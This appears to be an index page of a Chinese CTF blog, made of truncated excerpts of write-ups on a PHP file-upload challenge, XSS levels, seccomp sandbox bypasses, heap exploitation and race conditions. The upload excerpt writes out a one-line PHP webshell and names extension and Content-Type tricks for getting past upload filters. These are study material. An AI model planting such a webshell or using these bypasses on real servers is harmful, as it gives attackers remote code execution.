[极客大挑战 2019]Upload一句话木马
打开便是上传文件,那我们直接上传一句话木马:
1<? php @eval($_POST['cmd']); ?>
修改content-type
尝试抓包修改Content-Type
php后缀绕过
尝试修改后缀绕过
1.phtml .php1 .php2 .phar
又显示file里面不能包含<...
参考《CTF竞赛权威指南(PWN篇)》,ctf.wiki
1.FILE结构体文章:https://www.yuque.com/yuqueyonghupiiwso/gixo00/bekmilyu3sn6sh3e?singleDoc# 《FILE结构》
可以参考上面写的文章,下面简单说一下吧。
FILE结构体
FILE结构被被一系列流操作函数(fopen(),fread,fclose()等)所...
前言该文章简单介绍一下pwn出题的基本过程,仅限于docker部分,至于传到写题目的服务器上还没测试过.
Docker第一部分-安装引自GPT
安装相关依赖
1sudo apt install apt-transport-https ca-certificates curl software-properties-common
添加docker官方的GPG密钥
1curl -fsS...
例题[第二章 web进阶]XSS闯关题目链接:[BUUCTF在线评测](https://buuoj.cn/challenges#[第二章 web进阶]XSS闯关)
根据提示直接开始游戏,利用alert函数即可
非预期既然知道是个闯关游戏,那我们直接试level即可,到第七关的时候就有flag了
1n1book{xss_is_so_interesting}
...
前言Seccomp(1)已经大致介绍了一下沙箱,并且在最后的结尾处我自己还写了一个orw的源码,简单介绍了一下orw的汇编,这篇文章简单介绍一下常见的沙箱绕过方法。
参考文章:Linux X86架构 32 64系统调用表 ❤️❤️
ORW还是先简单介绍一下ORW,上一篇文章介绍了64位的,这里简单介绍一下32位
32位
先编译源码,在开始编译32位之前,要先安装32位的libseccomp以...
前言
也算打了蛮多比赛,每次比赛都会有沙箱Sandbox,每次都去上网查资料,这次整理一下各种资料,尽量完善一下关于这方面的知识点。
这里只介绍linux中的Seccomp
本部分只是基础介绍一下什么是Seccomp以及相关的指令
参考文章:this
介绍
先来了解一下什么是沙箱保护
Seccomp(Secure Computing Mode) 是 Linux 内核提供的一种安全机制...
前言off_by_null``Glibc2.27``Double Free
第一次遇到off_by_null,关键函数是strcpy
该题目要有较强的分析能力,时刻明白chunk被分配给谁了!!!!
分析add12345678910111213141516171819202122232425262728293031323334unsigned __int64 add(){ int...
前言完成上课的web作业,顺便做一些记录。
该部分主要是讲HTTP头的构造和cookie注入
[极客大挑战 2019]Http打开网站之后查看源码,发现:
于是打开看看
很明显是要我们自己构造HTTP的请求头,这里分为两种工具,一个是yakit,还有个是浏览器hackbar插件(我用的是Google)
yakit抓包构造http请求头1.修改访问网站
2.指定浏览器
3.从本地访...
前言Glibc2.24 UAF Unlink
参考:这篇文章
Unlink可以看我写的这个文章: http://downbeat.top/2024/09/25/zctf2016-note2-unlink/
checksec+ida1234567pwn@ctfpwn:~/Desktop/buuctf/wdb_2018_1st_babyheap$ checksec pwn[*] '/...
介绍参考文章:ctf.wiki
条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。这个术语最初来自于两个电信号互相竞争来影响输出结果。
简单来说就是当一个资源被两个进程同时调用,那么就会出错。
通常,条件竞争出现下面三种情况:
并发,即至少存在两个并发执行流。这里的执行流包括线程,进程,任务等...
